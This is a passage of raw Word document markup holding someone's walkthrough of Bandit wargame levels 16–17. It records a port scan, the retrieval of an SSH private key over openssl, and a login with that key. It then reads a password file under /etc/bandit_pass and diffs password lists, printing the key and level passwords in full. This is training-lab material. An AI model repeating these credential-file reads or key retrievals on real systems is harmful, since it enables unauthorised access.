          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host is up (0.00020s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D73AAB" w14:textId="77777777" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not shown: 999 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF26AFE" w14:textId="77777777" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PORT      STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF66F2" w14:textId="77777777" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>31518/tcp filtered unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C50CA0" w14:textId="35148790" w:rsidR="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>31790/tcp open     unknown</w:t>
      </w:r>
      <w:r w:rsidR="00A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F6622C" w14:textId="301B1C2A" w:rsidR="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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43D39262" w14:textId="77777777" w:rsidR="005A4A45" w:rsidRDefault="005A4A45" w:rsidP="00C102A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Then I check the 2 ports (one after the other) and find out that only the port </w:t>
      </w:r>
      <w:r w:rsidRPr="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>31790</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is using ssl!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1436E0" w14:textId="7C1444BC" w:rsidR="00C102AC" w:rsidRDefault="005A4A45" w:rsidP="00C102A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entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>openssl s_client -connect localhost:31790</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, entered the current level password (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cluFn7wTiGryunymYOu4RcffSxQluehd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C10CA" w14:textId="41567B5A" w:rsidR="00290C12" w:rsidRPr="00290C12" w:rsidRDefault="00A01145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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00290C12" w:rsidRPr="00290C12">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCBF0B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MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9E289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imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53047DEE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Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FFD55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DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738698F7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JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA73BF0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x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B31192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KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5EE65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J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49878929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d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5B605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YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344CCA3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vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B5591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+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE7909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8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36348D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SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8AB65F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HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8360B5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SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4421E5E2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R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CD8AE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Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47917349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R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32009CD3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L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D144E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blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50E362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YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FE16B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lastRenderedPageBreak/>
        <w:t>77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7B644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dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004813DE" w14:textId="77777777" w:rsidR="00290C12" w:rsidRP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vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6E5B03" w14:textId="6515A931" w:rsidR="00290C12" w:rsidRDefault="00290C12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90C12">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-----END RSA PRIVATE KEY-----</w:t>
      </w:r>
      <w:r w:rsidR="00A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA8BD5" w14:textId="399340D9" w:rsidR="005A4A45" w:rsidRDefault="005A4A45" w:rsidP="00290C1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14C2EA12" w14:textId="77777777" w:rsidR="005A4A45" w:rsidRDefault="005A4A45" w:rsidP="005A4A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I saved the private key locally, using the commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0D7F8" w14:textId="2B88F34D" w:rsidR="005A4A45" w:rsidRPr="00A01145" w:rsidRDefault="005A4A45" w:rsidP="005A4A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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuel</w:t>
      </w:r>
      <w:r w:rsidR="00A01145" w:rsidRPr="00A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5A73F" w14:textId="3BB7E331" w:rsidR="005A4A45" w:rsidRDefault="005A4A45" w:rsidP="005A4A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5A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nano /tmp/samuel</w:t>
      </w:r>
      <w:r w:rsidR="00A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>/sshkey17.private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1893A9C4" w14:textId="21C13E00" w:rsidR="00A01145" w:rsidRPr="005A4A45" w:rsidRDefault="00A01145" w:rsidP="005A4A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</w:p>
    <w:p w14:paraId="0AA10D8D" w14:textId="42ADB51F" w:rsidR="005A4A45" w:rsidRDefault="00A01145" w:rsidP="005A4A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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">And entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ssh -I /tmp/samuelKeys/sshkey17.private bandit17@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A50E3" w14:textId="3B19C5CF" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="005A4A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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4FD77" w14:textId="31B25DD0" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CC0C1" w14:textId="77777777" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B9624" w14:textId="77777777" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB9762" w14:textId="77777777" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permissions 0644 for '/tmp/samuelKeys/sshkey17.private' are too open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B35D6" w14:textId="77777777" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It is required that your private key files are NOT accessible by others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD252B" w14:textId="77777777" w:rsidR="00A01145" w:rsidRPr="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This private key will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C66B77" w14:textId="4391A825" w:rsidR="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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A01145">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load key "/tmp/samuelKeys/sshkey17.private": bad permissions”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC7E5D" w14:textId="1CB89758" w:rsidR="00A01145" w:rsidRDefault="00A01145" w:rsidP="00A011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780E6619" w14:textId="77777777" w:rsidR="007102E0" w:rsidRDefault="00A01145" w:rsidP="00A011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I changed the ssh private key file permissions to 0600, using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819DF3E" w14:textId="1EF3CE2A" w:rsidR="007102E0" w:rsidRDefault="00A01145" w:rsidP="007102E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7102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>chmod 0600</w:t>
      </w:r>
      <w:r w:rsidR="007102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/samuelKeys/sshkey17.privaye</w:t>
      </w:r>
      <w:r w:rsidR="007102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and tried again – I logged in successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38D87C" w14:textId="41D5BB81" w:rsidR="007102E0" w:rsidRDefault="007102E0" w:rsidP="007102E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78DBBAC9" w14:textId="65501B3B" w:rsidR="007102E0" w:rsidRPr="00F01CCA" w:rsidRDefault="007102E0" w:rsidP="007102E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For not doing the whole process again, I checked what is the bandit17 level’s password using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="007102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/bandit17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="007102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn</w:t>
      </w:r>
      <w:r w:rsidR="00F01CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E20D9" w14:textId="45309717" w:rsidR="007102E0" w:rsidRDefault="007102E0" w:rsidP="007102E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7102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[/etc/bandit_pass contains </w:t>
      </w:r>
      <w:r w:rsidR="00D63BE7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="007102E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>levels passwords]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74211E20" w14:textId="358DAA7C" w:rsidR="00BA1DDC" w:rsidRDefault="00BA1DDC" w:rsidP="007102E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16D23070" w14:textId="4849BBD8" w:rsidR="00BA1DDC" w:rsidRDefault="00BA1DDC" w:rsidP="007102E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BA1DDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB82C5D" w14:textId="5397F974" w:rsidR="00BA1DDC" w:rsidRDefault="00A7545A" w:rsidP="007102E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For getting the lines that are different between the files, I entered the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CCD7E4" w14:textId="23CD1AE1" w:rsidR="002E2411" w:rsidRDefault="00A7545A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2E2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>diff passwords.new passwords.old</w:t>
      </w:r>
      <w:r w:rsidR="002E2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79609941" w14:textId="2DCDADE0" w:rsidR="002E2411" w:rsidRPr="002E2411" w:rsidRDefault="002E2411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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>42c42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4579D" w14:textId="77777777" w:rsidR="002E2411" w:rsidRPr="002E2411" w:rsidRDefault="002E2411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2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt; kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1801E566" w14:textId="77777777" w:rsidR="002E2411" w:rsidRPr="002E2411" w:rsidRDefault="002E2411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2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8CE070" w14:textId="57D1E0F3" w:rsidR="002E2411" w:rsidRDefault="002E2411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2411">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt; hlbSBPAWJmL6WFDb06gpTx1pPButblOA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFB26E" w14:textId="545CEBDE" w:rsidR="002E2411" w:rsidRDefault="002E2411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0BD18F8C" w14:textId="4C104E98" w:rsidR="002E2411" w:rsidRDefault="002E2411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t xml:space="preserve">Which means that the next level password is: </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk20648436"/>
      <w:r w:rsidR="00AD487F" w:rsidRPr="00AD487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="28A3F88F" w14:textId="7B9CBD62" w:rsidR="00852289" w:rsidRPr="00852289" w:rsidRDefault="00852289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852289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[Be aware you won’t get in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00852289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead will get </w:t>
      </w:r>
      <w:r w:rsidRPr="00852289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Byebye !”</w:t>
      </w:r>
      <w:r w:rsidRPr="00852289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as output!]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FC2F8" w14:textId="6667947C" w:rsidR="00DA1A2E" w:rsidRDefault="00DA1A2E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5356D1FF" w14:textId="77777777" w:rsidR="00690FED" w:rsidRDefault="00690FED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</w:p>
    <w:p w14:paraId="07CDBFA2" w14:textId="77777777" w:rsidR="00690FED" w:rsidRDefault="00690FED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</w:p>
